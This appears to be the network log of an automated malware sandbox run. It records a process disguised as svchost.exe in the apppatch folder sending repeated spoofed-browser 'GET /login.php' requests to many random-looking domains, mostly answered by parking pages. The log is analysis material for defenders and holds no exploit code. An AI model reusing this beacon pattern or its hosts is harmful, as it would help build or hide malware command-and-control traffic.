                                                                                                                                                                                                              Nov 11, 2024 18:33:47.616910934 CET424INData Raw: 6e 67 2e 63 6f 6d 2f 74 65 6d 70 6c 61 74 65 73 2f 62 67 2f 61 72 72 6f 77 73 2e 70 6e 67 22 29 20 23 30 65 31 36 32 65 20 6e 6f 2d 72 65 70 65 61 74 20 74 6f 70 20 6c 65 66 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 39 34 25 20 36 34
                                                                                                                                                                                                              Data Ascii: ng.com/templates/bg/arrows.png") #0e162e no-repeat top left;background-size:94% 640px;flex-grow:1;position:inherit;top:90px;overflow:hidden;z-index:-1}.container-content__right{background:url("//img.sedoparking.com/templates/bg/arrows.png") #0
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.620790958 CET1236INData Raw: 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 7a 2d 69 6e 64 65 78 3a 2d 31 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 2d 2d 6c 70 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 37 32 30 70 78 7d 2e 63 6f 6e 74 61 69
                                                                                                                                                                                                              Data Ascii: 1);transform:scaleX(-1);z-index:-1}.container-content--lp{min-height:720px}.container-content--rp{width:100%;min-height:820px;margin:0}.container-content--twot{min-height:720px}.container-content--twot .container-content__container-ads--twot{m


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.8 | 60669 | 72.52.179.174 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:33:50.615560055 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gatyhub.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.8 | 60673 | 72.52.179.174 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:33:52.035198927 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gatyhub.com


Session ID | Source IP | Source Port | Destination IP | Destination Port
45 | 192.168.2.8 | 60687 | 188.114.96.3 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:34:03.747579098 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qegyhig.com


Session ID | Source IP | Source Port | Destination IP | Destination Port
46 | 192.168.2.8 | 60690 | 75.2.71.199 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:34:03.765811920 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: puzylyp.com


Session ID | Source IP | Source Port | Destination IP | Destination Port
47 | 192.168.2.8 | 60694 | 75.2.71.199 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:34:03.904922009 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: puzylyp.com


Session ID | Source IP | Source Port | Destination IP | Destination Port
48 | 192.168.2.8 | 60695 | 44.221.84.105 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:34:03.927210093 CET | 352 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qetyfuv.com
Cookie: snkz=66.23.206.109; btst=70bac528d3e702c5102aff809e6181c6|66.23.206.109|1731346389|1731346389|0|1|0


Session ID | Source IP | Source Port | Destination IP | Destination Port
49 | 192.168.2.8 | 60696 | 188.114.96.3 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:34:03.937165976 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qegyhig.com


Session ID | Source IP | Source Port | Destination IP | Destination Port
50 | 192.168.2.8 | 60698 | 188.114.96.3 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:34:03.946805954 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qegyhig.com


Session ID | Source IP | Source Port | Destination IP | Destination Port
51 | 192.168.2.8 | 60700 | 208.100.26.245 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:34:03.952369928 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lyvyxor.com


Session ID | Source IP | Source Port | Destination IP | Destination Port
52 | 192.168.2.8 | 60702 | 44.221.84.105 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:34:03.953007936 CET | 352 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vocyzit.com
Cookie: snkz=66.23.206.109; btst=4492d185efa1732c70e907a3d04910b3|66.23.206.109|1731346389|1731346389|0|1|0


Session ID | Source IP | Source Port | Destination IP | Destination Port
53 | 192.168.2.8 | 60709 | 199.191.50.83 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:34:05.774730921 CET | 281 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: galyqaz.com
Cookie: vsid=903vr478891988923922560


Session ID | Source IP | Source Port | Destination IP | Destination Port
54 | 192.168.2.8 | 60710 | 3.94.10.34 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:34:05.774811029 CET | 352 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lymyxid.com
Cookie: snkz=66.23.206.109; btst=fc1b6c412396387aa1fbc86a7deece62|66.23.206.109|1731346388|1731346388|0|1|0


Session ID | Source IP | Source Port | Destination IP | Destination Port
55 | 192.168.2.8 | 54072 | 178.162.203.202 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:35:02.393389940 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gatyfus.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.8 | 54073 | 162.255.119.102 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:35:02.401355982 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gahyqah.com
Nov 11, 2024 18:35:02.983468056 CET | 303 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:35:02 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                              Content-Length: 55
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: http://www.gahyqah.com/login.php
                                                                                                                                                                                                              X-Served-By: Namecheap URL Forward
                                                                                                                                                                                                              Server: namecheap-nginx
                                                                                                                                                                                                              Data Ascii: <a href='http://www.gahyqah.com/login.php'>Found</a>.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.8 | 57726 | 188.114.96.3 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:35:02.525770903 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qegyhig.com
Nov 11, 2024 18:35:03.235574007 CET | 980 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:35:03 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: https://qegyhig.com/login.php
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tklgkpdYvMOWRKecf4jC1%2BOF1aHCUUGn8WLxPfbX2Rh6BCsDlG8Zlg%2B%2BT8%2B%2FEbaEPxa%2FQIC0z7Rz7Qo8mtQ%2BMxG4uiUmXM%2BL%2ByL0tDpT3ykSa3wjA06f0x7VtBjNQQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8e10095b1b8543f9-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1525&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                              Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.8 | 57727 | 199.59.243.227 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:35:02.553469896 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: vojyqem.com
Nov 11, 2024 18:35:02.985515118 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                              date: Mon, 11 Nov 2024 17:35:02 GMT
                                                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                                                              content-length: 1094
                                                                                                                                                                                                              x-request-id: d7d3fb0a-0f39-4189-8a8c-fa00b75db873
                                                                                                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==
                                                                                                                                                                                                              set-cookie: parking_session=d7d3fb0a-0f39-4189-8a8c-fa00b75db873; expires=Mon, 11 Nov 2024 17:50:02 GMT; path=/
                                                                                                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
Nov 11, 2024 18:35:02.985552073 CET | 528 | IN
                                                                                                                                                                                                              Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZDdkM2ZiMGEtMGYzOS00MTg5LThhOGMtZmEwMGI3NWRiODczIiwicGFnZV90aW1lIjoxNzMxMzQ2NTAyLCJwYWdlX3VybCI6I


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.8 | 57728 | 44.221.84.105 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:35:02.574464083 CET | 352 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qetyfuv.com
                                                                                                                                                                                                              Cookie: btst=70bac528d3e702c5102aff809e6181c6|66.23.206.109|1731346389|1731346389|0|1|0; snkz=66.23.206.109
Nov 11, 2024 18:35:03.002321959 CET | 335 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:35:02 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=70bac528d3e702c5102aff809e6181c6|66.23.206.109|1731346502|1731346389|56|2|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
60 | 192.168.2.8 | 57729 | 208.100.26.245 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:35:02.599909067 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lyvyxor.com
Nov 11, 2024 18:35:03.045061111 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:35:02 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.2.8 | 57730 | 75.2.71.199 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:35:02.604688883 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: puzylyp.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.2.8 | 57731 | 3.94.10.34 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:35:02.673456907 CET | 352 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lymyxid.com
                                                                                                                                                                                                              Cookie: btst=fc1b6c412396387aa1fbc86a7deece62|66.23.206.109|1731346388|1731346388|0|1|0; snkz=66.23.206.109
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.030884027 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:35:02 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=fc1b6c412396387aa1fbc86a7deece62|66.23.206.109|1731346502|1731346388|57|2|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
63 | 192.168.2.8 | 57733 | 44.221.84.105 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:35:02.712440014 CET | 352 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vocyzit.com
Cookie: btst=4492d185efa1732c70e907a3d04910b3|66.23.206.109|1731346389|1731346389|0|1|0; snkz=66.23.206.109
Nov 11, 2024 18:35:03.164091110 CET | 335 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 17:35:03 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=4492d185efa1732c70e907a3d04910b3|66.23.206.109|1731346503|1731346389|57|2|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
64 | 192.168.2.8 | 57732 | 18.208.156.248 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:35:02.712507010 CET | 352 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vonypom.com
Cookie: btst=e8a049cc40d6b9d00effb9629f14927b|66.23.206.109|1731346389|1731346389|0|1|0; snkz=66.23.206.109
Nov 11, 2024 18:35:03.161793947 CET | 335 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 17:35:03 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=e8a049cc40d6b9d00effb9629f14927b|66.23.206.109|1731346503|1731346389|57|2|0; path=/; domain=.vonypom.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
65 | 192.168.2.8 | 57734 | 199.191.50.83 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:35:02.758084059 CET | 281 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: galyqaz.com
Cookie: vsid=903vr478891988923922560
Nov 11, 2024 18:35:05.146245003 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Nov 2024 17:35:03 GMT
Server: Apache
Referrer-Policy: no-referrer-when-downgrade
Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_NHOnw0G73BscnvIcyf8HaXYxUwB52N5y4R2rV77ldfg6F/P3HTMIgnr4aIPWR/fyPGslgb3huQzNdSH/7sK+hw==
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
66 | 192.168.2.8 | 57735 | 75.2.71.199 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:35:03.059156895 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: puzylyp.com


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              67192.168.2.857736208.100.26.245807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.112601042 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lyvyxor.com
Nov 11, 2024 18:35:03.560759068 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:35:03 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
68 | 192.168.2.8 | 57737 | 91.195.240.19 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:35:03.143022060 CET | 271 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: www.gahyqah.com
                                                                                                                                                                                                              Connection: Keep-Alive
Nov 11, 2024 18:35:03.771915913 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                              date: Mon, 11 Nov 2024 17:35:03 GMT
                                                                                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                                                                                              transfer-encoding: chunked
                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                              expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                              cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                              pragma: no-cache
                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA==
                                                                                                                                                                                                              last-modified: Mon, 11 Nov 2024 17:35:03 GMT
                                                                                                                                                                                                              x-cache-miss-from: parking-7596689c44-ptvfg
                                                                                                                                                                                                              server: Parking/1.0
                                                                                                                                                                                                              Data Ascii: 858<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA==><head><meta charset="utf-8"><title>gahyqah.com&nbsp;-&nbsp;gahyqah Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="gahyqah.com is your first and best source for all of the information youre looking for. From g


Session ID | Source IP | Source Port | Destination IP | Destination Port
69 | 192.168.2.8 | 57739 | 154.212.231.82 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:35:04.339593887 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
